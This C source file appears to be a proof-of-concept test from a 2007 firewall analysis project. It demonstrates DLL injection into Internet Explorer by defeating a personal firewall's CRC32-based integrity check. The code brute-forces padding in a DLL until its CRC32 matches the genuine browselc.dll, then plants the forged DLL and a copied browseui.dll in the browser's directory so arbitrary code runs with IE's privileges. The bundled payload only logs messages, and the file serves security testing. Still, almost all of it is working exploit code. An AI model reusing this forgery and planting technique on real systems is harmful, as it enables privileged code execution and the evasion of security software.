/*

 Testing program for DLL injection via weak hash function exploitation (BTP00005P005CF)
 

 Usage:
 prog IEPATH
   IEPATH - Internet Explorer installation directory

 Description:
 This program assumes that Internet Explorer is a privileged application and its components 
 are protected by CFP to prevent DLL injections. This program copies "browseui.dll" and its 
 own copy of "browselc.dll" to the Internet Explorer installation directory. When Internet Explorer 
 is run a malicious code is executed with all the privileges of Internet Explorer. 
 In this demostration the malicious code is simulated by a harmless code that logs messages to 
 a file. Fake "browselc.dll" can be arbitrary DLL which is modified on its end to have 
 the same CRC32 as the original DLL in the system.

 Test:
 Running the testing program with the Internet Explorer installation directory as an argument 
 and running Internet Explorer itself.

*/

#include <stdio.h>
#include <windows.h>
#include "crc32.h"

static const struct CRC_IJK
{
  u_int32_t crc;
  int i;
  int j;
  int k;
} known[] =
{
  { 0xA69F47D5, 0x0B1B, 0x6554, 0xA86B00E4 },   // Windows 2000 Service Pack 4
  { 0x5BC25C24, 0x0808, 0x6821, 0xC32A810C },   // Windows XP Service Pack 2
  { 0xB6651040, 0x088A, 0x2653, 0xA86B0040 },   // Windows Server 2003 Standard Edition Service Pack 1
  { 0x00000000, 0x0000, 0x0000, 0x00000000 }
};

void about(void)
{
  printf("Testing program for DLL injection via weak hash function exploitation (BTP00005P005CF)\n");
  printf("Windows Personal Firewall analysis project\n");
  printf("Copyright 2007 by Matousec - Transparent security\n");
  printf("http://www.matousec.com/""\n\n");
  return;
}

void usage(void)
{
  printf("Usage: test IEPATH\n"
         "  IEPATH - Internet Explorer installation directory\n");
  return;
}

void print_last_error(void)
{
  LPTSTR buf;
  DWORD code=GetLastError();
  if (FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,NULL,code,0,(LPTSTR)&buf,0,NULL))
  {
    fprintf(stderr,"Error code: %ld\n",code);
    fprintf(stderr,"Error message: %s",buf);
    LocalFree(buf);
  } else fprintf(stderr,"Unable to format error message for code %ld.\n",code);
  return;
}


int main(int argc,char **argv)
{
  about();

  if (argc!=2)
  {
    usage();
    return 1;
  }

  chksum_crc32gentab();


  char sysdir[MAX_PATH],browseui_org[MAX_PATH],browselc_org[MAX_PATH],browseui_new[MAX_PATH],testdll_new[MAX_PATH];
  GetSystemDirectory(sysdir,MAX_PATH);
  snprintf(browseui_org,MAX_PATH,"%s\\browseui.dll",sysdir);
  snprintf(browselc_org,MAX_PATH,"%s\\browselc.dll",sysdir);
  snprintf(browseui_new,MAX_PATH,"%s\\browseui.dll",argv[1]);
  snprintf(testdll_new,MAX_PATH,"%s\\browselc.dll",argv[1]);

  int result=FALSE;
  u_int32_t crc_bsorg=0;
  HANDLE file=CreateFile(browselc_org,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,0,NULL);
  if (file!=INVALID_HANDLE_VALUE)
  {
    DWORD size=GetFileSize(file,NULL);
    char *data=malloc(size);
    if (data)
    {
      DWORD bytes;
      if (ReadFile(file,data,size,&bytes,NULL))
      {
        crc_bsorg=chksum_crc32_cont(data,size,0,0xFFFFFFFF) ^ 0xFFFFFFFF;
        printf("crc=0x%X\n",crc_bsorg);
      }
      free(data);
    }
    CloseHandle(file);
  }

  int ki=1,kj=1,kk=0xC32A8101,kmatch=FALSE;
  
  for (int idx=0;known[idx].crc;idx++)
    if (known[idx].crc==crc_bsorg)
    {
      kmatch=TRUE;
      ki=known[idx].i;
      kj=known[idx].j;
      kk=known[idx].k;
      printf("CRC value for \"browselc.dll\" matches known value idx = %d.\n",idx);
      break;
    }
  
  int match=FALSE;

  file=CreateFile("testdll.dll",GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,0,NULL);
  if (file!=INVALID_HANDLE_VALUE)
  {
    DWORD size=GetFileSize(file,NULL);
    char *data=malloc(size);
    if (data)
    {
      DWORD bytes;
      if (ReadFile(file,data,size,&bytes,NULL))
      {
        int pat=0;
        for (int i=0;i<size-sizeof(DWORD);i++)
          if ((*(DWORD*)&data[i])==0x58585858)
          {
            pat=i;
            break;
          }

        if (pat)
        {
          printf("Pattern found at offset %d.\n",pat);

          u_int32_t crc1=chksum_crc32_cont(data,pat,0,0xFFFFFFFF);
          printf("crc1 = 0x%X\n",crc1);

          PDWORD di=(PDWORD)&data[pat+0];
          PDWORD dj=(PDWORD)&data[pat+sizeof(DWORD)];
          PDWORD dk=(PDWORD)&data[pat+2*sizeof(DWORD)];
          printf("Assembling DLL ...");
          u_int32_t crc_test=0;
          for (int k=kk;k!=0;k++)
          {
            *dk=(DWORD)k;
            for (int j=kj;j<0x8000;j++)
            {
              *dj=(DWORD)j;
              for (int i=ki;i<0x1000;i++)
              {
                *di=(DWORD)i;

                crc_test=chksum_crc32_cont(data,size,pat,crc1) ^ 0xFFFFFFFF;
                match=crc_test==crc_bsorg;

                if (match)
                {
                  printf("\n\nMatch found for i=0x%lX, j=0x%lX, k=0x%lX\n",(DWORD)i,(DWORD)j,(DWORD)k);
                  break;
                }
              }

              if (match) break;
            }
            if (!(k%0x100)) 
              printf("\ncurrent k = 0x%lX, last hash = 0x%X continue ",(DWORD)k,crc_test);

            if (match) break;
          }
          printf("\n");
        } else fprintf(stderr,"Unable to find pattern in \"testdll.dll\".\n");

      }

      if (match)
      {
        HANDLE newfile=CreateFile(testdll_new,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
        if (newfile!=INVALID_HANDLE_VALUE)
        {
          if (WriteFile(newfile,data,size,&bytes,NULL)) 
          {
            result=CopyFile(browseui_org,browseui_new,FALSE);
            if (!result) 
            {
              fprintf(stderr,"Unable to copy \"%s\" to \"%s\".\n",browseui_org,browseui_new);
              print_last_error();
              fprintf(stderr,"\n");
            } else printf("\"%s\" copied to \"%s\".\n",browseui_org,browseui_new);
          } else
          {
            fprintf(stderr,"Unable to write to file \"%s\".\n",testdll_new);
            print_last_error();
            fprintf(stderr,"\n");
          }
          CloseHandle(newfile);
        } else 
        {
          fprintf(stderr,"Unable to create file \"%s\".\n",testdll_new);
          print_last_error();
          fprintf(stderr,"\n");
        }
      }
      free(data);
    }
    CloseHandle(file);
  } else 
  {
    fprintf(stderr,"Unable to open \"testdll.dll\".\n");
    print_last_error();
    fprintf(stderr,"\n");
  }

  result ? printf("\nTEST SUCCESSFUL!\n") : printf("\nTEST FAILED!\n");
  return result ? 0 : 1;
}
